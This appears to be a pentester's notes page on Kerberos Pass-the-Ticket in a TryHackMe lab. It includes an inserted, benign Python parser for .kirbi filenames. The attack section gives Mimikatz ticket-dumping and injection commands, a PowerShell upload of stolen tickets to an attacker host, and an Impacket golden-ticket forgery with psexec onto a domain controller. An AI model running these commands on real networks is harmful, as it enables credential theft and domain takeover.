Pass the Ticket

Anatomy of a Kerberos Ticket

[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi
|_______| ^ |________| |_____________| |_____________________||_____|
    |     |     |              |                   |             |______file extension
    |     |     |              |                   |
    |     |     |              |                   |______resource
    |     |     |              |
    |     |     |              |______user/computer account (ticket owner)
    |     |     |
    |     |     |______0x40e10000 kerberos flag [1]
    |     |
    |     |______kerberos ticket type
    |            0 = TGS / 1 = Client ticket / 2 = TGT
    |
    |__________0x97d82 user LUID [2]

[1] Example output from running "klist" on a Windows host

0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize


[2] Each logon session has a locally-unique identifier (LUID). A LUID is a system-generated 64-bit value guaranteed to be unique during a single boot session on the system on which it was generated. Some LUIDs are predefined. For example, the LUID for the System account’s logon session is always 0x3e7 (999 decimal), the LUID for Network Service’s session is 0x3e4 (996), and Local Service’s is 0x3e5 (997). Most other LUIDs are randomly generated.
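As an added example (not code from the page or its author), the following Python script turns the anatomy above into a parser: it splits a Mimikatz-style .kirbi filename into its fields, decodes the 32-bit Kerberos flag value into the names klist prints, and labels the predefined LUIDs from note [2]. It also groups exported TGTs by logon session, which is what a responder wants when triaging a directory of tickets recovered from a host. Assumptions not stated on the page are marked in the comments: the "[hi;lo]" pair is treated as the high and low parts of the 64-bit LUID, the unlabelled numeric field between the ticket type and the flags is treated as an index, and the third sample filename is constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Kerberos TicketFlags numbered as in RFC 4120 section 5.4.1: bit 0 is the
# most significant bit of the 32-bit value, so bit n has mask 1 << (31 - n).
# name_canonicalize (0x00010000) is the Windows-specific flag klist prints.
TICKET_FLAG_BITS: Dict[int, str] = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate",
    15: "name_canonicalize",
}

# Ticket group encoded in the filename, per the anatomy above.
TICKET_TYPES = {0: "TGS", 1: "Client ticket", 2: "TGT"}

# Predefined logon-session LUIDs from note [2].
WELL_KNOWN_LUIDS = {0x3E7: "SYSTEM", 0x3E4: "NETWORK SERVICE", 0x3E5: "LOCAL SERVICE"}

# [hi;lo]-type-index-flags-owner@resource.kirbi
# Assumption: "[hi;lo]" is the 64-bit LUID's high and low parts, and the field
# between the ticket type and the flags (unlabelled above) is a per-group index.
KIRBI_NAME_RE = re.compile(
    r"^\[(?P<hi>[0-9a-fA-F]+);(?P<lo>[0-9a-fA-F]+)\]"
    r"-(?P<type>\d)-(?P<index>\d+)-(?P<flags>[0-9a-fA-F]{8})"
    r"-(?P<owner>[^@]+)@(?P<resource>.+)\.kirbi$"
)


@dataclass
class KirbiInfo:
    luid: int
    luid_label: str
    ticket_type: int
    ticket_type_name: str
    index: int
    flags: int
    flag_names: List[str] = field(default_factory=list)
    owner: str = ""
    resource: str = ""


def decode_ticket_flags(flags: int) -> List[str]:
    """Return the names of the bits set in a 32-bit TicketFlags value, MSB first."""
    names = []
    for bit in range(32):
        if flags & (1 << (31 - bit)):
            names.append(TICKET_FLAG_BITS.get(bit, f"bit{bit}"))
    return names


def parse_kirbi_name(name: str) -> KirbiInfo:
    """Split a Mimikatz-style .kirbi filename into its labelled fields."""
    m = KIRBI_NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a mimikatz-style .kirbi filename: {name}")
    luid = (int(m["hi"], 16) << 32) | int(m["lo"], 16)
    flags = int(m["flags"], 16)
    ttype = int(m["type"])
    return KirbiInfo(
        luid=luid,
        luid_label=WELL_KNOWN_LUIDS.get(luid, "user/other logon session"),
        ticket_type=ttype,
        ticket_type_name=TICKET_TYPES.get(ttype, "unknown"),
        index=int(m["index"]),
        flags=flags,
        flag_names=decode_ticket_flags(flags),
        owner=m["owner"],
        resource=m["resource"],
    )


def summarize_tgts(names: List[str]) -> Dict[str, List[str]]:
    """Map each principal to the logon-session LUIDs holding a TGT for it.

    Answers "whose TGTs were in memory, and under which logon sessions?"
    from filenames alone, without opening the ticket bodies."""
    out: Dict[str, List[str]] = {}
    for n in names:
        info = parse_kirbi_name(n)
        if info.ticket_type_name == "TGT":
            out.setdefault(info.owner, []).append(f"0x{info.luid:x}")
    return out


if __name__ == "__main__":
    # The two filenames from the page plus one constructed SYSTEM-session service ticket.
    sample = [
        "[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi",
        "[0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi",
        "[0;3e7]-0-1-40a50000-WORKSTATION$@cifs-thmiis.za.tryhackme.com.kirbi",
    ]
    for n in sample:
        i = parse_kirbi_name(n)
        print(f"{i.owner:<18} {i.ticket_type_name:<13} luid=0x{i.luid:x} ({i.luid_label}) "
              f"flags=0x{i.flags:08x} {' '.join(i.flag_names)}")
    print(summarize_tgts(sample))
```

Unknown flag bits are reported as bitN rather than dropped, so a ticket with an unexpected flag value stands out instead of being silently normalised.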

Pass the Ticket

In general, a Ticket-Granting Ticket (TGT) gives us more mileage than a Ticket-Granting Service (TGS) ticket. A TGT lets us request new TGS tickets for any service as that user, whereas a TGS only re-authenticates us to the single service the user previously requested it for.

Windows

Assuming you have a shell on a Windows target and manage to dump the tickets cached on the box, you'll generally use tools such as Mimikatz, Rubeus, Kekeo, etc. to inject and pass tickets around the network.

Mimikatz

mimikatz # sekurlsa::tickets /export

Dump Cached Tickets

[0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi

Valid TGT

kerberos::ptt [0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi

Mimikatz PTT

Linux

Tickets Dumped from Windows Target

https://notes.benheater.com/books/file-transfers-and-data-exfiltration/page/file-transfer-techniques

# Add all the tickets to a .zip archive
Compress-Archive -Path .\*.kirbi -DestinationPath tickets.zip

# Send the .zip archive to Kali
# The UploadFile method requires two arguments:
#   URI
#   Absolute path to the file
$webClient = New-Object System.Net.WebClient
$webClient.UploadFile('http://kali-vpn-ip/upload.php', "$PWD\tickets.zip")

Demonstrates dumping cached .kirbi tickets on the target, compressing them to .zip, and uploading them to Kali for further processing

# Convert the TGT to Linux format
impacket-ticketConverter '[0;ca99f8]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi' 't1_toby.beck.ccache'

Tickets have been transferred to Kali. Use impacket-ticketConverter to convert .kirbi to .ccache

KRB5CCNAME='t1_toby.beck.ccache' impacket-GetNPUsers -k -no-pass -usersfile users.txt \
-dc-ip 10.80.80.2 'ZA.TRYHACKME.COM/t1_toby.beck'@thmiis.za.tryhackme.com

Example using the .ccache ticket to authenticate as t1_toby.beck

More Examples of Kerberos Authentication from Kali

https://notes.benheater.com/books/active-directory/page/kerberos-authentication-from-kali

Targeted Attacks

Impacket Golden Ticket

enum4linux -l dc.ad.lab

Use enum4linux to dump the domain SID

impacket-ticketer -aesKey 'KRBTGT_KERBEROS_AESKEY' \
-domain-sid 'S-1-5-21-DOMAIN-SID-HERE' \
-domain 'ad.lab' -dc-ip '10.80.80.2' -user-id '500' 'Administrator'

Use impacket-ticketer along with the KRBTGT AES key to generate a Kerberos TGT for Administrator

KRB5CCNAME=Administrator.ccache impacket-psexec -dc-ip 10.80.80.2 'ad.lab/Administrator'@dc.ad.lab

Pass Administrator's TGT to the domain controller